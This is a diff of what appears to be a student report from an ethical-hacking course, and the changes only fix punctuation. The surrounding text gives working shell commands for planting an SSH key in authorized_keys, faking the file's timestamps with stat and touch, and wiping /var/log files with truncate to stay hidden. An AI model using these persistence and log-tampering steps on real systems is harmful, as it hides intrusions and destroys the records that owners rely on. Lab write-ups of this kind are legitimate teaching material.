Owanesh/ETH2324/phase_2/REPORT.md

 ```

 ## Restoring files change and access date
-Before changing the `authorized_keys` file, we save its creation and modification date
+Before changing the `authorized_keys` file, we save its creation and modification date.

 ```sh
 stat -c %y authorized_keys > old_mod_time
 stat -c %x authorized_keys > old_acc_time
 ```
-Modify it by adding our public key for persistance, then restoring the two dates like so
+Modify it by adding our public key for persistance, then restoring the two dates like so:

 ```sh
 touch -d "$(cat old_mod_time)" authorized_keys
 touch -a "$(cat old_acc_time)" authorized_keys
 ```
-And finally every file created in doing so, including `id_rsa.pub` which we put before with `scp`
+And finally every file created in doing so, including `id_rsa.pub` which we put before with `scp`.

 ```sh
 rm old_mod_time old_acc_time id_rsa.pub
 ```
 We can also use this method to carefully restore every access and change date, if we really wanted to be stealthy.

 ## Clearing the logs
 Then we cleared all the logs from the system.
 The logs are stored in `/var/log` and are divided by categories.
-We decided not to remove the files entirely (as it would raise more concerns victim-side), but to just empty them out
+We decided not to remove the files entirely (as it would raise more concerns victim-side), but to just empty them out.

 ```sh
 truncate -s 0 /var/log/auth.log
 truncate -s 0 /var/log/cron.log